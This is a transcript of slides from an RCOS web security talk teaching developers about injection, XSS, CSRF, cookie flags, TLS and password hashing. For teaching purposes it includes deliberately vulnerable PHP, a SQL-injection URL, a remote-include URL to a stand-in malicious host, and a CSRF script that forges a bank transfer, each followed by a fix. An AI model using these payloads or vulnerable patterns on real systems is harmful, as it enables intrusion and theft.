RCOS Security Talk

Transcript

1. YOU SUCK at security

2. 1. Your attackers are better

3. Do NOT ROLL YOUR OWN

4. None

5. 1.  Open-source 2.  Audited 3.  Active community

6. 2. Security is hard

7. No. Seriously.

8. 5,000 CVEs /yr

9. 3. Dont trust input

10. <?php! $query = "SELECT * FROM users WHERE username='". "$_GET[’user']."'";

    ! $result = mysql_query($query);!

11. /derp.php?user=x’ DROP TABLE users;--!

12. /derp.php?user=x’ DROP TABLE users;--! http://xkcd.com/327/

13. <?php! $stmt = $dbh->prepare("SELECT FROM users WHERE username=?");! $stmt->execute(array($_GET['user']));! Use

    Parameter Binding

14. <div><?php echo $row['username']; ?></div>! XSS. Inject javascript

15. <html>! <body>! "<form method="POST" action="/users/add">! " "<input type="text" name="username">! "

    "<input type="password" name="password">! " "<input type="hidden" name="isAdmin" value="true">! " "<button type="submit">Create user</button>! "</form>! </body>! </html>! Unexpected Input. Sneaky DOM edit

16. <?php! include('header.php');! include($_GET['page']);! include('footer.php');! ! /index.php?page=http://sketchy.su/BadTime.php! Remote Include.

17. Sanitize all input

18. Blacklist Only use if you know all cases Less restrictive

    on user

19. Whitelist Best security Very restrictive

20. Protip Markdown Google Caja

21. 4. Protect your cookies

22. Set-Cookie: SESSIONID=S8d2d1ffd5cb37209ef71982b80f16d7b! Bad Session

23. Set-Cookie: SESSIONID=S8d2d1ffd5cb37209ef71982b80f16d7b; ! "HttpOnly; secure! GOOD Session Send over SSL

    only HTTP access only Prevents XSS theft

24. 5. No Outsiders

25. <iframe name="bank"></iframe>! <script>! "document.write('! " "<form ! " " action="https://MyBank.com/account/transfer"

    ! " " target="bank" ! " " method="POST" ! " " name="injected">! " " "<input type="text" name="amount" value="1000.00" />! " " "<input type="text" name="to" value="[email protected]" />! " "</form>! "');! "injected.submit();! </script>!

26. CSRF sucks

27. Block it. Require a unique token per request X-Frame-Options: Block

28. 6. Encrypt everything

29. Too expensive? startssl.com

30. Self-sign Dev Environment openssl req -x509 -newkey des3:2048 -keyout key.pem

    - out cert.pem -days XXX!

31. Verify All CERTS <?php! // cURL supports SSL verification! curl_setopt($ch,

    CURLOPT_SSL_VERIFYPEER, true);! ! //File_get_contents does NOT! file_get_contents($url);!

32. Verify Servers Use server certs to verify servers to one

    another

33. Harden SSL Disable SSL2 Disable TLS1.0 compression Disable weak ciphers

    (DES, RC4) h"p://blog.cloudflare.com/staying-­‐on-­‐top-­‐of-­‐tls-­‐a"acks  

34. Force SSL

35. 7. Use Slow Hashes

36. No Plaintext Passwords Just don’t.

37. Hash + Salt MD5 SHA1 … HMAC + bcrypt

38. Wait. Explain. We want to be slow.

39. Method password = bcrypt(HMAC(password, local_salt), bcrypt_salt)!

40. Salt-free db Store salt on file system Two attacks needed

    Or both

41. Migrate. Maintain two hashes Rehash on successful login Purge old

    hashes after x duration

42. Lost Passwords Hash a one-time login ID

43. 8. Remember the basics

44. Random IV Having the IV be public is okay

45. Wait for entropy /dev/random waits /dev/urandom non-blocking

46. Use ECC NSA-Proof * * As far as we know,

    at least…

47. Passwordless Login Use keypairs for server access

48. 9. Use libraries

49. Crypto NaCL SJCL Crypto++ QCA

50. Web Frameworks Python: Django, Flask PHP: Laravel, Phalcon Go: Revel

    Node: Sails Java/Scala: Play Ruby: Rails

51. Assume nothing Always research security best practices

52. Questions? Complaints?

53. Im hiring Sysadmin.union.rpi.edu/apply